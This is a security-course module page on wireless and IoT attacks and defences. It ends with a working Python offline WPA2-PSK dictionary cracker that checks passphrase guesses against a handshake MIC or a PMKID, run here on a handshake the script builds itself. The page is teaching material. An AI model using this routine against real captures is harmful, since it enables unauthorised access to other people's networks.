Module 12 · The unwired attack surface

Wireless & IoT Security

Every modern network has an edge that doesn't end at a cable. Phones roam between APs, badges open doors over Bluetooth, smart bulbs talk Zigbee to a hub that talks WiFi to your router, and a factory floor runs on LoRaWAN. Each of those protocols has its own security model, its own historical mistakes, and its own current attacks. This module covers all of them.

6 reference pages · 3 wireless stacks (WiFi, BT, IoT) · 1 handshake capture lab

Wireless and IoT are the network you can't see — and increasingly, the network you can't avoid. A 2024 enterprise has more WiFi clients than wired ones, more BLE peripherals than USB ones, and a building full of IoT (cameras, badge readers, HVAC controllers, printers, projectors, smart TVs) that most security teams don't even inventory.

This module covers the protocols, the attacks that target each one, and the defenses that actually work. The goal is dual fluency: enough to talk credibly with a wireless or IoT engineer, evaluate an enterprise WiFi or IoT proposal, and know what to demand of vendors when their hardware lands on your network.

12.A · Reference pages

12.01 · WiFi Fundamentals · 802.11, channels, the 2.4/5/6 GHz radio reality
802.11 standards from a/b/g through Wi-Fi 7. Channels, frequencies, BSS/ESS/SSID/BSSID, and the management frames (beacons, probes, associations) that drive every attack on the next page. Those frames are unauthenticated unless 802.11w protected management frames is enabled, which is exactly why deauth works. Why "5 GHz is just faster" misses the point.
12.02 · WPA Evolution · WEP → WPA → WPA2 → WPA3
The encryption history that everyone in security needs to know cold. The 4-way handshake. WPA3's SAE (Dragonfly) and what it fixed. PSK vs Enterprise (802.1X/EAP). Why WPS has to be disabled. Opportunistic Wireless Encryption (OWE) for open networks.
12.03 · Wireless Attacks · Evil twins, deauth, KRACK, PMKID
The actual offense: evil twin APs, deauthentication floods (and how 802.11w/PMF blunts them), KRACK, PMKID-based offline cracking, war driving with WiGLE, rogue APs, Pixie Dust against WPS, captive portal phishing. Each attack with the prerequisite, the move, and the defense.
12.04 · Bluetooth Security · Classic vs BLE, pairing, the named attacks
Bluetooth Classic versus BLE, the four pairing association models (Just Works, Passkey Entry, Out of Band, Numeric Comparison), and the named attacks: BlueBorne, KNOB, BIAS, BlueSmacking, BLE eavesdropping. Why your AirPods are doing more cryptography than you think.
12.05 · The IoT Landscape · Zigbee, Z-Wave, LoRaWAN, MQTT, Matter
The constrained-device problem: kilobytes of RAM, no full TLS stack, often no firmware update path. Zigbee, Z-Wave, LoRaWAN, Thread, Matter, and the application-layer protocols (MQTT, CoAP) that ride on top. Why "just put a cert on it" doesn't work.
12.06 · IoT Threats & Defenses · Mirai to Matter
Mirai and the botnet era of default credentials. Shodan as a recon weapon. Firmware extraction and analysis. The defenses that actually work: VLAN segmentation, OTA updates, certificate provisioning, NIST IR 8259, the EU Cyber Resilience Act.
12.B · Hands-on lab

LAB
WPA2 Handshake Capture & Crack
A browser-only simulator of capturing a WPA2 4-way handshake from a deauth-induced reconnect, then running an offline dictionary attack against the PSK. See exactly why "Password123" loses in milliseconds and a 16-character random PSK doesn't.
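The arithmetic the lab simulates, written out as an added example (not the lab's own code, and not from any cracking tool): WPA2-PSK derives the PMK with PBKDF2-HMAC-SHA1 over the passphrase and SSID, expands it into the PTK with the 802.11i PRF using both MAC addresses and both nonces, and signs EAPOL message 2 with the first 16 bytes of the PTK (the KCK). An attacker who has sniffed message 2, or just a PMKID from message 1, can therefore test a candidate passphrase entirely offline. The "captured" handshake below is constructed inside the script from a known passphrase so it runs offline; every MAC address, nonce and SSID is made up.

```python
"""Offline WPA2-PSK verification against a 4-way handshake capture or a PMKID.

Added example, not the course's lab code. Implements IEEE 802.11i key
derivation with only the standard library:
  PMK   = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)
  PTK   = PRF-512(PMK, "Pairwise key expansion",
                  min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce))
  KCK   = PTK[0:16]; MIC = HMAC-SHA1(KCK, EAPOL-Key frame with MIC zeroed)[:16]
          (key descriptor version 2, i.e. WPA2/CCMP)
  PMKID = HMAC-SHA1(PMK, "PMK Name" || AA || SPA)[:16]
All capture values below are constructed for the example.
"""
import hashlib
import hmac

# EAPOL-Key layout: 802.1X hdr(4) | desc(1) | key info(2) | key len(2) | replay(8)
# | nonce(32) | IV(16) | RSC(8) | ID(8) | MIC(16) | key data len(2) | key data
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1 blocks with an 8-bit counter, truncated to 64 bytes."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, client_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, frame_with_mic_zeroed: bytes) -> bytes:
    return hmac.new(kck, frame_with_mic_zeroed, hashlib.sha1).digest()[:16]


def pmkid(pmk: bytes, ap_mac: bytes, client_mac: bytes) -> bytes:
    return hmac.new(pmk, b"PMK Name" + ap_mac + client_mac, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce: bytes, replay_counter: int = 1) -> bytes:
    """Minimal EAPOL-Key message 2 (client -> AP), MIC field still zero."""
    body = (b"\x02"                              # descriptor type: RSN
            + (0x010A).to_bytes(2, "big")        # key info: version 2, pairwise, MIC set
            + (0).to_bytes(2, "big")             # key length (0 in message 2)
            + replay_counter.to_bytes(8, "big")
            + snonce + bytes(16) + bytes(8) + bytes(8)
            + bytes(16)                          # MIC placeholder
            + (0).to_bytes(2, "big"))            # key data length
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body


# Constructed "capture": locally administered MACs, fixed nonces, made-up SSID.
SSID = "LabNet"
AP_MAC = bytes.fromhex("02000000aa01")
CLIENT_MAC = bytes.fromhex("02000000bb02")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))


def build_capture(passphrase: str) -> dict:
    """Play the AP/client side once so the attacker functions have something to crack."""
    pmk = pmk_from_passphrase(passphrase, SSID)
    ptk = derive_ptk(pmk, AP_MAC, CLIENT_MAC, ANONCE, SNONCE)
    frame = bytearray(build_eapol_msg2(SNONCE))
    frame[MIC_OFFSET:MIC_OFFSET + 16] = eapol_mic(ptk[:16], bytes(frame))
    return {"ssid": SSID, "ap": AP_MAC, "client": CLIENT_MAC, "anonce": ANONCE,
            "snonce": SNONCE, "eapol": bytes(frame), "pmkid": pmkid(pmk, AP_MAC, CLIENT_MAC)}


def check_candidate(capture: dict, passphrase: str) -> bool:
    """Attacker side: recompute the MIC of the captured message 2 under a guess."""
    pmk = pmk_from_passphrase(passphrase, capture["ssid"])
    ptk = derive_ptk(pmk, capture["ap"], capture["client"], capture["anonce"], capture["snonce"])
    frame = bytearray(capture["eapol"])
    captured_mic = bytes(frame[MIC_OFFSET:MIC_OFFSET + 16])
    frame[MIC_OFFSET:MIC_OFFSET + 16] = bytes(16)
    return eapol_mic(ptk[:16], bytes(frame)) == captured_mic


def check_candidate_pmkid(capture: dict, passphrase: str) -> bool:
    """Same attack from a PMKID alone: no client, no deauth, one frame from the AP."""
    pmk = pmk_from_passphrase(passphrase, capture["ssid"])
    return pmkid(pmk, capture["ap"], capture["client"]) == capture["pmkid"]


def dictionary_attack(capture: dict, wordlist, checker=check_candidate):
    """Return (passphrase, guesses tried) or (None, guesses tried)."""
    for tried, word in enumerate(wordlist, 1):
        if checker(capture, word):
            return word, tried
    return None, len(wordlist)


if __name__ == "__main__":
    words = ["123456", "qwerty", "Password123", "letmein"]
    print(dictionary_attack(build_capture("Password123"), words))            # found on guess 3
    print(dictionary_attack(build_capture("k7Qz!m2Rp9xV#e4L"), words))       # never in the list
```

Two things the code makes concrete. The SSID is the PBKDF2 salt, so every guess costs 4096 HMAC-SHA1 rounds per network and precomputed tables only help against common SSIDs; that cost, not any secret in the handshake, is the only thing standing between a weak passphrase and the attacker. And the PMKID path needs no client at all, which is why "nobody was connected" is not a defense; SAE in WPA3 is, because its exchange gives an eavesdropper nothing to run this loop against.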